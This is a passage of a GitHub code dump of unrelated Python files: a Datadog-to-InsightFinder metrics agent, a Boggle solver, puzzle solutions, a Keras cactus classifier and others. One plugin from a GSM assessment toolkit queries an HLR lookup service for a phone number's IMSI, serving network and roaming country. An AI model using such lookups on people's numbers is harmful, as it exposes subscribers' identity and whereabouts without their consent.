len(result['host_list']) != 0:\n for host_meta in result['host_list']:\n hosts_list.append(host_meta[\"name\"])\n return hosts_list\n\n\ndef get_metric_data(metric_list, host_list, start_time, end_time, collected_data_map):\n \"\"\"Get metric data from Datadog API\"\"\"\n\n def format_data_entry(json_data_entry):\n metric_name = json_data_entry.get('metric')\n logger.debug(\"json_data_entry is: \" + str(json_data_entry))\n host_name_arr = str(json_data_entry.get('scope'))\n logger.debug(\"host_name_arr is: \" + host_name_arr)\n host_name_arr = host_name_arr.split(\":\")\n logger.debug(\"host_name_arr length is: \" + str(len(host_name_arr)))\n if len(host_name_arr) > 0:\n logger.debug(\"host_name_arr[1] is: \" + str(host_name_arr[1]))\n if len(host_name_arr) == 2:\n #host_name = host_name_arr[0]\n host_name = host_name_arr[1]\n else:\n host_name = \"unknown_host\"\n datapoints = json_data_entry.get('pointlist', [])\n header_field = make_safe_metric_key(metric_name) + \"[\" + make_safe_metric_key(host_name) + \"]\"\n for each_point in datapoints:\n if len(each_point) < 2 or each_point[1] is None:\n continue\n metric_value = each_point[1]\n epoch = int(each_point[0])\n if epoch in collected_data_map:\n timestamp_value_map = collected_data_map[epoch]\n else:\n timestamp_value_map = {}\n\n timestamp_value_map[header_field] = str(metric_value)\n collected_data_map[epoch] = timestamp_value_map\n\n # Set one metric multiple host\n # for metric in all_metrics_list:\n query = \"\"\n for host_name in host_list:\n for each_metric in metric_list:\n #query += each_metric + '{*}by{' + host_name + '},'\n query += each_metric + '{host:' + host_name + '},'\n query = query[:-1]\n\n datadog_metrics_result = datadog.api.Metric.query(start=start_time, end=end_time, query=query)\n\n status = datadog_metrics_result.get('status', 'error')\n\n if status == 'ok' and datadog_metrics_result['series']:\n # format metric and save to collected_data_map\n map(lambda d: format_data_entry(d), datadog_metrics_result['series'])\n\n\ndef send_data(chunk_metric_data):\n send_data_time = time.time()\n # prepare data for metric streaming agent\n to_send_data_dict = dict()\n to_send_data_dict[\"metricData\"] = json.dumps(chunk_metric_data)\n to_send_data_dict[\"licenseKey\"] = agent_config_vars['licenseKey']\n to_send_data_dict[\"projectName\"] = agent_config_vars['projectName']\n to_send_data_dict[\"userName\"] = agent_config_vars['userName']\n to_send_data_dict[\"instanceName\"] = socket.gethostname().partition(\".\")[0]\n to_send_data_dict[\"samplingInterval\"] = str(int(agent_config_vars['samplingInterval']) * 60)\n to_send_data_dict[\"agentType\"] = \"custom\"\n\n to_send_data_json = json.dumps(to_send_data_dict)\n logger.debug(\"TotalData: \" + str(len(bytearray(to_send_data_json))))\n\n # send the data\n post_url = parameters['serverUrl'] + \"/customprojectrawdata\"\n for _ in xrange(ATTEMPTS):\n try:\n if len(if_proxies) == 0:\n response = requests.post(post_url, data=json.loads(to_send_data_json))\n else:\n response = requests.post(post_url, data=json.loads(to_send_data_json), proxies=if_proxies)\n if response.status_code == 200:\n logger.info(str(len(bytearray(to_send_data_json))) + \" bytes of data are reported.\")\n logger.debug(\"--- Send data time: %s seconds ---\" % (time.time() - send_data_time))\n else:\n logger.info(\"Failed to send data.\")\n return\n except requests.exceptions.Timeout:\n logger.exception(\n \"Timed out while flushing to InsightFinder. Reattempting...\")\n continue\n except requests.exceptions.TooManyRedirects:\n logger.exception(\n \"Too many redirects while flushing to InsightFinder.\")\n break\n except requests.exceptions.RequestException as e:\n logger.exception(\n \"Exception while flushing to InsightFinder.\")\n break\n\n logger.error(\n \"Failed to flush to InsightFinder! Gave up after %d attempts.\", ATTEMPTS)\n\n\ndef chunks(l, n):\n \"\"\"Yield successive n-sized chunks from l.\"\"\"\n for index in xrange(0, len(l), n):\n yield l[index:index + n]\n\n\ndef chunk_map(data, SIZE=50):\n \"\"\"Yield successive n-sized chunks from l.\"\"\"\n it = iter(data)\n for i in xrange(0, len(data), SIZE):\n yield {k: data[k] for k in islice(it, SIZE)}\n\n\ndef make_safe_metric_key(metric):\n metric = LEFT_BRACE.sub('(', metric)\n metric = RIGHT_BRACE.sub(')', metric)\n metric = PERIOD.sub('/', metric)\n return metric\n\n\ndef normalize_key(metric_key):\n \"\"\"\n Take a single metric key string and return the same string with spaces, slashes and\n non-alphanumeric characters subbed out.\n \"\"\"\n metric_key = SPACES.sub(\"_\", metric_key)\n metric_key = SLASHES.sub(\".\", metric_key)\n metric_key = NON_ALNUM.sub(\"\", metric_key)\n return metric_key\n\n\ndef set_logger_config(level):\n \"\"\"Set up logging according to the defined log level\"\"\"\n # Get the root logger\n logger_obj = logging.getLogger(__name__)\n # Have to set the root logger level, it defaults to logging.WARNING\n logger_obj.setLevel(level)\n # route INFO and DEBUG logging to stdout from stderr\n logging_handler_out = logging.StreamHandler(sys.stdout)\n logging_handler_out.setLevel(logging.DEBUG)\n # create a logging format\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(process)d - %(threadName)s - %(levelname)s - %(message)s')\n logging_handler_out.setFormatter(formatter)\n logger_obj.addHandler(logging_handler_out)\n\n logging_handler_err = logging.StreamHandler(sys.stderr)\n logging_handler_err.setLevel(logging.WARNING)\n logger_obj.addHandler(logging_handler_err)\n return logger_obj\n\n\nif __name__ == \"__main__\":\n GROUPING_START = 15000\n GROUPING_END = 20000\n SPACES = re.compile(r\"\\s+\")\n SLASHES = re.compile(r\"\\/+\")\n NON_ALNUM = re.compile(r\"[^a-zA-Z_\\-0-9\\.]\")\n LEFT_BRACE = re.compile(r\"\\[\")\n RIGHT_BRACE = re.compile(r\"\\]\")\n PERIOD = re.compile(r\"\\.\")\n ATTEMPTS = 3\n\n parameters = get_parameters()\n log_level = parameters['logLevel']\n logger = set_logger_config(log_level)\n data_dir = 'data'\n agent_config_vars = get_agent_config_vars()\n if_proxies = dict()\n if len(agent_config_vars['httpProxy']) != 0:\n if_proxies['http'] = agent_config_vars['httpProxy']\n if len(agent_config_vars['httpsProxy']) != 0:\n if_proxies['https'] = agent_config_vars['httpsProxy']\n\n # get agent configuration details\n datadog_config = get_datadog_config()\n datadog_proxies = dict()\n if len(datadog_config['httpProxy']) != 0:\n datadog_proxies['http'] = datadog_config['httpProxy']\n if len(datadog_config['httpsProxy']) != 0:\n datadog_proxies['https'] = datadog_config['httpsProxy']\n if len(datadog_proxies) != 0:\n datadog_api = datadog.initialize(api_key=datadog_config['DATADOG_API_KEY'],\n app_key=datadog_config['DATADOG_APP_KEY'],\n proxies=datadog_proxies)\n else:\n datadog_api = datadog.initialize(api_key=datadog_config['DATADOG_API_KEY'],\n app_key=datadog_config['DATADOG_APP_KEY'])\n\n time_list = []\n # get data by cron\n data_end_ts = int(time.time())\n interval_in_secs = int(agent_config_vars['samplingInterval']) * 60\n data_start_ts = data_end_ts - interval_in_secs\n time_list = [(data_start_ts, data_end_ts)]\n try:\n raw_data_map = collections.OrderedDict()\n metric_data = []\n chunk_number = 0\n\n # get hosts list\n all_host_list = agent_config_vars['filterHosts']\n if len(all_host_list) == 0:\n all_host_list = get_host_list()\n\n # generate normalization ids if metrics are from API(config list empty)\n all_metrics_list = agent_config_vars['allMetrics']\n if len(all_metrics_list) == 0:\n all_metrics_list = get_metric_list()\n\n for data_start_ts, data_end_ts in time_list:\n logger.debug(\"Getting data from datadog for range: {}-{}\".format(data_start_ts, data_end_ts))\n retry_metric_list = []\n retry_host_list = []\n\n for sub_metric_list in chunks(all_metrics_list, agent_config_vars['metricChunkSize']):\n for sub_host_list in chunks(all_host_list, agent_config_vars['hostChunkSize']):\n # get metric data from datadog every SAMPLING_INTERVAL\n try:\n get_metric_data(sub_metric_list, sub_host_list, data_start_ts, data_end_ts, raw_data_map)\n except Exception as e:\n retry_host_list.append(sub_host_list)\n retry_metric_list.append(sub_metric_list)\n logger.debug(\"Error while fetching metrics from DataDog. \" + str(sub_host_list))\n\n # retry for failed hosts\n for sub_metric_list in retry_metric_list:\n for sub_host_list in retry_host_list:\n # get metric data from datadog every SAMPLING_INTERVAL with 3 retry attempts\n for _ in xrange(ATTEMPTS):\n try:\n get_metric_data(sub_metric_list, sub_host_list, data_start_ts, data_end_ts, raw_data_map)\n break\n except Exception as e:\n logger.exception(\n \"Error while fetching metrics from DataDog. Reattempting...\\n Hosts: \" + str(\n sub_host_list))\n logger.exception(e)\n\n if len(raw_data_map) == 0:\n logger.error(\"No data for metrics received from datadog.\")\n sys.exit()\n for raw_data_map_chunk in chunk_map(raw_data_map, parameters['chunkLines']):\n min_timestamp = sys.maxsize\n max_timestamp = -sys.maxsize\n for timestamp in raw_data_map_chunk.keys():\n value_map = raw_data_map_chunk[timestamp]\n value_map['timestamp'] = str(timestamp)\n metric_data.append(value_map)\n min_timestamp = min(min_timestamp, timestamp)\n max_timestamp = max(max_timestamp, timestamp)\n if len(metric_data) != 0:\n chunk_number += 1\n logger.debug(\"Sending Chunk Number: \" + str(chunk_number))\n logger.info(\"Sending from datadog for range: {}-{}\".format(min_timestamp, max_timestamp))\n send_data(metric_data)\n metric_data = []\n\n except Exception as e:\n logger.error(\"Error sending metric data to InsightFinder.\")\n logger.error(e)\n","repo_name":"insightfinder/InsightAgent","sub_path":"datadog/getmetrics_datadog.py","file_name":"getmetrics_datadog.py","file_ext":"py","file_size_in_byte":19521,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"18"} +{"seq_id":"28364420206","text":"# Cole Halvorson\n# Boggle.py\n# analyzes boggle board from image and returns valid words\n# ONLY WORKS WITH SQUARE ARRAYS (2X2, 3X3, 4X4, ...)\n\nimport sys\nimport json\nimport time\nfrom OCR import analyzeImage, boardSize\nfrom _thread import start_new_thread\n\n\n# initialize dictionary from json file\ndef initDictionary():\n f = open('dictionary.json', 'r')\n data = json.load(f)\n f.close()\n\n for word in data: # remove all words less than 3 chars, capitalize\n if (len(word) > 2):\n dictionary.append(word.upper())\n\n# Binary Search Function\ndef binarySearch(Str, low, high, arr):\n if high >= low:\n mid = (high + low) // 2\n \n # If element is present at the middle itself\n if arr[mid] == Str:\n return True\n \n # If element is smaller than mid, then it can only\n # be present in left subarray\n elif arr[mid] > Str:\n return binarySearch(Str, low, mid - 1, arr)\n \n # Else the element can only be present in right subarray\n else:\n return binarySearch(Str, mid + 1, high, arr)\n \n else:\n # Element is not present in the array\n return False\n \n# A recursive function to print all words present on boggle\ndef findWordsUtil(boggle, visited, i, j, Str, size):\n # Mark current cell as visited and\n # append current character to str\n visited[i][j] = True\n Str = Str + boggle[i][j]\n\n # if string has not already been found and is in dictionary \n # add to list of found words\n # sort found for binary search\n if not(binarySearch(Str, 0, len(found) - 1, found)) and ((binarySearch(Str, 0, len(dictionary) - 1, dictionary))): \n found.append(Str)\n found.sort() \n \n # Traverse 8 adjacent cells of boggle[i,j]\n row = i - 1\n while row <= i + 1 and row < size:\n col = j - 1\n while col <= j + 1 and col < size:\n if (row >= 0 and col >= 0 and not visited[row][col]):\n findWordsUtil(boggle, visited, row, col, Str, size)\n col+=1\n row+=1\n \n # Erase current character from string and\n # mark visited of current cell as false\n Str = \"\" + Str[-1]\n visited[i][j] = False\n \n# find strings in board\ndef findWords(boggle, size):\n \n # Mark all characters as not visited\n visited = [[False for i in range(size)] for j in range(size)]\n \n # Initialize current string\n Str = \"\"\n \n # Consider every character and look for all words\n # starting with this character\n for i in range(size):\n for j in range(size):\n findWordsUtil(boggle, visited, i, j, Str, size)\n \n# print found words\ndef printFound():\n elapsedTime = str(time.time() - startTime)\n numWords = str(len(found))\n\n print('found ' + numWords + ' words in ' + elapsedTime + ' seconds:')\n\n for word in found: # print found words\n print(word) \n\n# print board\ndef printBoard(board, size):\n print('OCR recognized ' + str(size) + 'x' + str(size) + ' board:')\n print('')\n \n for row in board:\n print(row)\n\n print('')\n\n# sort found list by string length, longest first\ndef sortFound():\n found.sort(key=len, reverse=True) \n\n# print loading message\ndef printLoading(): \n while True:\n for x in range(0,4):\n b = 'analyzing, please wait' + ' .' * x\n print(b, end='\\r')\n time.sleep(1)\n\n sys.stdout.write('\\x1b[2K')\n\n# --------------------------------------------------------------------------------------------------\n# Driver Code\n# --------------------------------------------------------------------------------------------------\nstartTime = time.time()\n\ndictionary = []\nfound = []\nboard = []\n\nimg = 'images/4x4.jpg'\n\ninitDictionary()\nanalyzeImage(img, board)\nprintBoard(board, boardSize(img))\nstart_new_thread(printLoading, ())\nfindWords(board, boardSize(img))\nsortFound()\nprintFound()\n\n","repo_name":"chalvors/boggle_matrix_analysis","sub_path":"Boggle.py","file_name":"Boggle.py","file_ext":"py","file_size_in_byte":3996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"30522171425","text":"#! /usr/bin/env python\n# coding=utf-8\nimport logging, os\nfrom cloghandler import ConcurrentRotatingFileHandler\nfrom logging import handlers\nimport time\n\n\nclass Logger:\n def __init__(self, path, clevel=logging.DEBUG, Flevel=logging.DEBUG, when='M', backCount=5,\n fmt='%(asctime)s - %(pathname)s[line:%(lineno)d] - %(levelname)s: %(message)s'):\n self.logger = logging.getLogger(path)\n self.logger.setLevel(logging.DEBUG)\n fmt = logging.Formatter('%(asctime)s | %(message)s', '%Y-%m-%d %H:%M:%S')\n # fmt = logging.Formatter('%(asctime)s | %(message)s')\n # Use an absolute path to prevent file rotation trouble.\n logfile = os.path.abspath(path)\n # Rotate log after reaching 512K, keep 5 old copies.\n rh = ConcurrentRotatingFileHandler(logfile, \"a\", 10 * 1024 * 1024 * 1024, backCount)\n # th = handlers.TimedRotatingFileHandler(filename=logfile, when=when, backupCount=backCount, encoding='utf-8')\n rh.setFormatter(fmt)\n\n # 设置CMD日志\n sh = logging.StreamHandler()\n sh.setFormatter(fmt)\n sh.setLevel(clevel)\n # 设置文件日志\n fh = logging.FileHandler(path, encoding='utf-8')\n fh.setFormatter(fmt)\n fh.setLevel(Flevel)\n self.logger.addHandler(sh)\n # self.logger.addHandler(fh)\n # self.logger.addHandler(th)\n self.logger.addHandler(rh)\n\n def debug(self, message):\n self.logger.debug(message)\n\n def info(self, message):\n self.logger.info(message)\n\n def war(self, message):\n self.logger.warn(message)\n\n def error(self, message):\n self.logger.error(message)\n\n def cri(self, message):\n self.logger.critical(message)\n\n def collection(self, imei, unique_id, tag_algorithm, recommend_algorithm, hot_word_index, user_tag, similarity,\n recommend_type):\n # 时间 | imei | 唯一id | 标签算法 | 推荐算法 | 热词列表索引 | 用户标签 | 相似度 | 数据类型(1:算法推荐, 2:ctr+original)\n srt = imei + \" | \" + unique_id + \" | \" + tag_algorithm + \" | \" + recommend_algorithm + \\\n \" | \" + hot_word_index + \" | \" + user_tag + \" | \" + similarity + \" | \" + recommend_type\n self.logger.info(srt)\n\n# if __name__ == '__main__':\n# logyyx = Logger('./log/all.log', logging.ERROR, logging.DEBUG)\n# index = 1.0\n# while True:\n# index = index + 1\n# imei = \"----\" + str(index) + \"-----\"\n#\n# data_str = imei + \" | \" + \"---唯一id---\" + \" | \" + \"----标签算法----\" + \" | \" + \"---推荐算法----\" + \\\n# \" | \" + \"----热词列表索引 ------\" + \" | \" + \"-----用户标签-----\" + \" | \" + \"-----相似度----\"\n# logyyx.collection(imei, \"--唯一id--\", \"--标签算法--\", \"--推荐算法--\", \"--热词列表索引--\", \"--用户标签--\", \"--相似度--\")\n# time.sleep(0.005)\n","repo_name":"shiquanliao/recommend","sub_path":"app/utils/Logging.py","file_name":"Logging.py","file_ext":"py","file_size_in_byte":2894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"29150752860","text":"def metadata(data, start):\n\tchild = data[start]\n\tentries = data[start+1]\n\tsum = 0\n\n\tstart += 2\n\n\tif child == 0:\n\t\tfor i in range(entries):\n\t\t\tsum += data[start+i]\n\telse:\n\t\tnodes = []\n\n\t\tfor i in range(child):\n\t\t\tvalue, start = metadata(data, start)\n\t\t\tnodes.append(value)\n\n\t\tfor i in range(entries):\n\t\t\tj = data[start+i] - 1\n\t\t\tif j < len(nodes):\n\t\t\t\tsum += nodes[j]\n\n\treturn sum, start + entries\n\nwith open('8-in', 'r') as f:\n\tdata = list(map(int, f.read().strip().split()))\n\n\tprint(metadata(data, 0)[0])\n","repo_name":"sspenst/adventofcode2018","sub_path":"8-2.py","file_name":"8-2.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"34212472059","text":"import io\nimport sys\n\n_INPUT = \"\"\"\\\n4\n1 2\n4 2\n3 1\n\"\"\"\nsys.stdin = io.StringIO(_INPUT)\n\n\nn = int(input())\nconnect = [[] for _ in range(n+1)]\nvisited = [False for _ in range(n+1)]\n\nfor i in range(n-1):\n a, b = map(int, input().split())\n connect[a].append(b)\n connect[b].append(a)\n\nfrom collections import deque\nque = deque()\n\nque.append(1)\n\nwhile que:\n now = que.popleft()\n\n for to in connect[now]:\n if visited[to] == False:\n visited[to] = True\n\n que.append(to)\n\n print(to)\n\nprint(connect)\nprint(visited)","repo_name":"kkchart9/atcoder","sub_path":"ABC/213_d.py","file_name":"213_d.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"25303208280","text":"import os\nfrom contextlib import contextmanager\nfrom typing import List\n\nfrom pip_save.metadata.dependencies import Dependency, VersionedDependency\nfrom pip_save.toml.assemble import parse_toml\nfrom pip_save.toml.model import Root\nfrom pip_save.toml.model import Table\nfrom pip_save.toml.source import InvalidTomlError\nfrom pip_save.toml.writer import to_toml\n\n\nclass Project(object):\n def __init__(self, root=None):\n self._root = root or Root()\n\n if 'deps' not in self._root:\n self._root['deps'] = Table()\n self._deps_table = self._root['deps']\n self.deps = [] # type: List[Dependency]\n for dep_name, dep_metadata in self._root['deps'].items():\n print(dep_name, dep_metadata)\n\n self.dev_deps = [] # type: List[Dependency]\n if 'dev_deps' not in self._root:\n self._root['dev_deps'] = Table()\n self._dev_deps_table = self._root['dev_deps']\n\n def add_dependency(self, dep: Dependency) -> None:\n self.deps.append(dep)\n if isinstance(dep, VersionedDependency):\n self._deps_table[dep.pkg_name] = dep.matcher.specifiers\n\n @classmethod\n def from_toml(cls, text: str) -> 'Project':\n root = parse_toml(text)\n return cls(root=root)\n\n def to_toml(self):\n return to_toml(self._root)\n\n\n\n@contextmanager\ndef build_project_state(fpath):\n if not os.path.exists(fpath):\n raise InvalidTomlError('File {fpath} does not exist. Please, run \"{init}\" or create it manually.'\n .format(fpath=fpath,\n init=\"packager init\"))\n\n with open(fpath, 'r') as f:\n text = f.read()\n\n project = Project.from_toml(text)\n\n yield project\n out = project.to_toml()\n\n with open(fpath, 'w') as f:\n f.write(out)\n","repo_name":"mkurnikov/pip-save","sub_path":"pip_save/metadata/project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":1822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"72731396200","text":"import heapq\n# https://www.geeksforgeeks.org/heap-queue-or-heapq-in-python/\n\nfin = open(\"spectacole.txt\")\ns = [line.strip() for line in fin.readlines()]\nn = len(s)\n\nL=[]\n\nfor i in range(n):\n L.append(s[i].split())\n L[i][0] = L[i][0].split(\"-\")\nL.sort()\n\nR=[[L[0]]]\n\nheap = [(L[0][0][1], 0)]\nfor i in range(1,n):\n ver = 0\n if heap[0][0] <= L[i][0][0]:\n popped = heapq.heappop(heap)\n nr_salii = popped[1]\n heapq.heappush(heap, (L[i][0][1], nr_salii))\n R[nr_salii].append(L[i])\n else:\n nr_salii = len(R)\n heapq.heappush(heap, (L[i][0][1], nr_salii))\n R.append([L[i]])\n # for j in range(len(R)):\n # if L[i][0][0] >= R[j][len(R[j])-1][0][1]:\n # R[j].append(L[i])\n # ver = 1\n # break\n # if ver == 0:\n # R.append([L[i]])\n\nprint(len(R))\nfor i in R:\n for j in range(len(i)):\n print(\"({}-{} {})\".format(i[j][0][0],i[j][0][1],i[j][1]), end=\", \" if j < len(i)-1 else \"\\n\")","repo_name":"floricamatei/FMI-Materials","sub_path":"Year I/Semester I/Programarea Algorimilor/Materiale/2022 - 2023/Laboratoare/Grupa 151/Laborator 05/Subgrupa 02/spectacole_heap.py","file_name":"spectacole_heap.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"71426695400","text":"import numpy as np\n\nimport matplotlib.pyplot as plt\n\nimport pandas as pd\n\n\n\nimport tensorflow as tf\n\nfrom tensorflow import keras\n\n\n\nimport os\n\nfrom shutil import copyfile, move\n\nfrom tqdm import tqdm\n\nimport h5py\nprint(tf.__version__)\n\nprint(tf.test.is_gpu_available())\ntraining_df = pd.read_csv(\"../input/train.csv\")\n\ntraining_df.head()\nsrc = \"../input/train/train/\"\n\ndst = \"../sorted_training/\"\n\n\n\nos.mkdir(dst)\n\nos.mkdir(dst+\"true\")\n\nos.mkdir(dst+\"false\")\n\n\n\nwith tqdm(total=len(list(training_df.iterrows()))) as pbar:\n\n for idx, row in training_df.iterrows():\n\n pbar.update(1)\n\n if row[\"has_cactus\"] == 1:\n\n copyfile(src+row[\"id\"], dst+\"true/\"+row[\"id\"])\n\n else:\n\n copyfile(src+row[\"id\"], dst+\"false/\"+row[\"id\"])\nsrc = \"../sorted_training/\"\n\ndst = \"../sorted_validation/\"\n\n\n\nos.mkdir(dst)\n\nos.mkdir(dst+\"true\")\n\nos.mkdir(dst+\"false\")\n\n\n\nvalidation_df = training_df.sample(n=int(len(training_df)/10))\n\n\n\nwith tqdm(total=len(list(validation_df.iterrows()))) as pbar:\n\n for idx, row in validation_df.iterrows():\n\n pbar.update(1)\n\n if row[\"has_cactus\"] == 1:\n\n move(src+\"true/\"+row[\"id\"], dst+\"true/\"+row[\"id\"])\n\n else:\n\n move(src+\"false/\"+row[\"id\"], dst+\"false/\"+row[\"id\"])\nfrom tensorflow.keras.models import Sequential\n\nfrom tensorflow.keras.layers import InputLayer, Input\n\nfrom tensorflow.keras.layers import Conv2D, Dense, Flatten, Dropout, Activation\n\nfrom tensorflow.keras.layers import BatchNormalization, Reshape, MaxPooling2D, GlobalAveragePooling2D\n\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\n\nfrom tensorflow.keras.callbacks import EarlyStopping, ModelCheckpoint\nbatch_size = 64\n\n\n\ntrain_datagen = ImageDataGenerator(\n\n rescale=1. / 255,\n\n horizontal_flip=True,\n\n vertical_flip=True)\n\n\n\ntrain_data_dir = \"../sorted_training\"\n\ntrain_generator = train_datagen.flow_from_directory(\n\n train_data_dir,\n\n shuffle=True,\n\n target_size=(32, 32),\n\n batch_size=batch_size,\n\n class_mode='binary')\n\n\n\n\n\nvalidation_datagen = ImageDataGenerator(rescale=1. / 255)\n\nvalidation_data_dir = \"../sorted_validation\"\n\nvalidation_generator = validation_datagen.flow_from_directory(\n\n validation_data_dir,\n\n target_size=(32, 32),\n\n batch_size=batch_size,\n\n class_mode='binary')\n\n\n\ninput_shape = (32,32,3)\n\nnum_classes = 2\n\ndropout_dense_layer = 0.6\n\n\n\nmodel = Sequential()\n\nmodel.add(Conv2D(32, (3, 3), input_shape=input_shape))\n\nmodel.add(BatchNormalization())\n\nmodel.add(Activation('relu'))\n\nmodel.add(Conv2D(32, (3, 3)))\n\nmodel.add(BatchNormalization())\n\nmodel.add(Activation('relu'))\n\nmodel.add(Conv2D(32, (3, 3)))\n\nmodel.add(BatchNormalization())\n\nmodel.add(Activation('relu'))\n\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\n\n\nmodel.add(Conv2D(64, (3, 3)))\n\nmodel.add(BatchNormalization())\n\nmodel.add(Activation('relu'))\n\nmodel.add(Conv2D(64, (3, 3)))\n\nmodel.add(BatchNormalization())\n\nmodel.add(Activation('relu'))\n\nmodel.add(Conv2D(64, (3, 3)))\n\nmodel.add(BatchNormalization())\n\nmodel.add(Activation('relu'))\n\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\n\n\nmodel.add(Conv2D(128, (3, 3)))\n\nmodel.add(BatchNormalization())\n\nmodel.add(Activation('relu'))\n\n\n\nmodel.add(Flatten())\n\nmodel.add(Dense(1024))\n\nmodel.add(Activation('relu'))\n\nmodel.add(Dropout(dropout_dense_layer))\n\n\n\nmodel.add(Dense(256))\n\nmodel.add(Activation('relu'))\n\nmodel.add(Dropout(dropout_dense_layer))\n\n\n\nmodel.add(Dense(1))\n\nmodel.add(Activation('sigmoid'))\nmodel.compile(loss=keras.losses.binary_crossentropy,\n\n optimizer=keras.optimizers.Adam(lr=0.001),\n\n metrics=['accuracy'])\ncallbacks = [EarlyStopping(monitor='val_loss', patience=25),\n\n ModelCheckpoint(filepath='best_model.h5', monitor='val_loss', save_best_only=True)]\nepochs = 100\n\nhistory = model.fit_generator(train_generator,\n\n validation_data=validation_generator,\n\n epochs=epochs,\n\n verbose=1,\n\n shuffle=True,\n\n callbacks=callbacks)\nplt.plot(history.history['loss'])\n\nplt.plot(history.history['val_loss'])\n\nplt.show()\nplt.plot(history.history['acc'])\n\nplt.plot(history.history['val_acc'])\n\nplt.show()\nmodel.load_weights(\"best_model.h5\")\ntest_folder = \"../input/test/\"\n\ntest_datagen = ImageDataGenerator(\n\n rescale=1. / 255)\n\n\n\ntest_generator = test_datagen.flow_from_directory(\n\n directory=test_folder,\n\n target_size=(32,32),\n\n batch_size=1,\n\n class_mode='binary',\n\n shuffle=False\n\n)\npred=model.predict_generator(test_generator,verbose=1)\n\npred_binary = [0 if value<0.50 else 1 for value in pred] \ncsv_file = open(\"sample_submission_cnn.csv\",\"w\")\n\ncsv_file.write(\"id,has_cactus\\n\")\n\nfor filename, prediction in zip(test_generator.filenames,pred_binary):\n\n name = filename.split(\"/\")[1].replace(\".tif\",\"\")\n\n csv_file.write(str(name)+\",\"+str(prediction)+\"\\n\")\n\ncsv_file.close()","repo_name":"aorursy/new-nb-3","sub_path":"frlemarchand_simple-cnn-using-keras.py","file_name":"frlemarchand_simple-cnn-using-keras.py","file_ext":"py","file_size_in_byte":4859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"70202154921","text":"from turtle import *\ncolor = [\"red\", \"blue\", \"brown\", \"yellow\", \"grey\"]\nfor i in range(5):\n fillcolor(color[i])\n begin_fill()\n for n in range(2):\n forward(100)\n left(90)\n forward(200)\n left(90)\n end_fill()\n forward(100)\nmainloop()\n","repo_name":"thewantedx/NguyenQuangHuy-python-c4tb02","sub_path":"session9/turtle_fillcolor.py","file_name":"turtle_fillcolor.py","file_ext":"py","file_size_in_byte":274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"5018827589","text":"# -*- coding: utf-8 -*-\nfrom adapter.hlrlookups_com_adapter import HlrLookupsComAdapter, HlrLookupError\nfrom core.plugin.interface import plugin, PluginBase, arg, cmd, subcmd\n\n\n@plugin(name='HLR Lookup', description='Performs HLR lookup.')\nclass HlrlookupPlugin(PluginBase):\n @cmd(name=\"hlr\", description=\"Lookup a phone number in HLR using hlr-lookup.com.\", parent=True)\n def hlr(self, args):\n pass\n\n @arg('msisdn', action=\"store\", help=\"MSISDN to query (i.e. +43123456789).\")\n @subcmd(name=\"lookup\", help=\"Lookup a phone number in HLR using hlr-lookup.com.\", parent=\"hlr\")\n def hlr_lookup(self, args):\n \"\"\"\n Perform a lookup at hlrlookups.com\n \"\"\"\n adapter = HlrLookupsComAdapter(self._config_provider)\n try:\n result = adapter.lookup(args.msisdn)\n output = \"HLR lookup result for %s (ID: %s):\\n\\n\" % (result['msisdn'], result['id'])\n output += \"Valid: %s\\n\" % result['isvalid']\n output += \"Status: %s\\n\" % result['subscriberstatus']\n output += \"MCC / MNC: %s %s\\n\" % (result['mcc'], result['mnc'])\n output += \"IMSI: %s\\n\" % result['imsi']\n output += \"Network (Country): %s (%s)\\n\" % (result['originalnetworkname'], result['originalcountryname'])\n output += \"Serving MSC / HLR: %s / %s\\n\" % (result['servingmsc'], result['servinghlr'])\n output += \"Is roaming: %s\\n\" % result['isroaming']\n if result['isroaming'] == 'Yes':\n output += \"Roaming Network (Country): %s (%s)\\n\" % (result['roamingnetworkname'],\n result['roamingcountryname'])\n self.printmsg(output)\n\n except HlrLookupError as e:\n self.printmsg(\"ERROR: HLR lookup of %s failed\" % args.msisdn)\n self.printmsg(\"Message was: %s\" % e.message)\n\n @subcmd(name='balance', help='Lookup your account balance at hlr-lookup.com.', parent=\"hlr\")\n def hlr_balance(self, args):\n \"\"\"\n Get the current balance in EURO from hlrlookups.com\n \"\"\"\n adapter = HlrLookupsComAdapter(self._config_provider)\n try:\n result = adapter.get_balance()\n self.printmsg(\"Current balance is: EUR %.2f\" % float(result))\n\n except HlrLookupError as e:\n self.printmsg(\"ERROR: HLR balance inquiry failed\")\n self.printmsg(\"Message was: %s\" % e.message)\n","repo_name":"romankh/gsm-assessment-toolkit","sub_path":"plugins/hlrlookup_plugin.py","file_name":"hlrlookup_plugin.py","file_ext":"py","file_size_in_byte":2452,"program_lang":"python","lang":"en","doc_type":"code","stars":64,"dataset":"github-code","pt":"18"} +{"seq_id":"6563361294","text":"from selenium import webdriver\n\ndriver=webdriver.Firefox()\n# get方法 打开指定网址\ndriver.get('http://www.baidu.com')\nprint(driver.get_cookies())\n# 查找元素\nelement_keyword=driver.find_element_by_id(\"kw\")\n\n# 输入字符\nelement_keyword.send_keys('松勤')\n\n# 找到搜索按钮\nelement_search_button=driver.find_element_by_id(\"su\")\n# 点击该元素\nelement_search_button.click()\n# 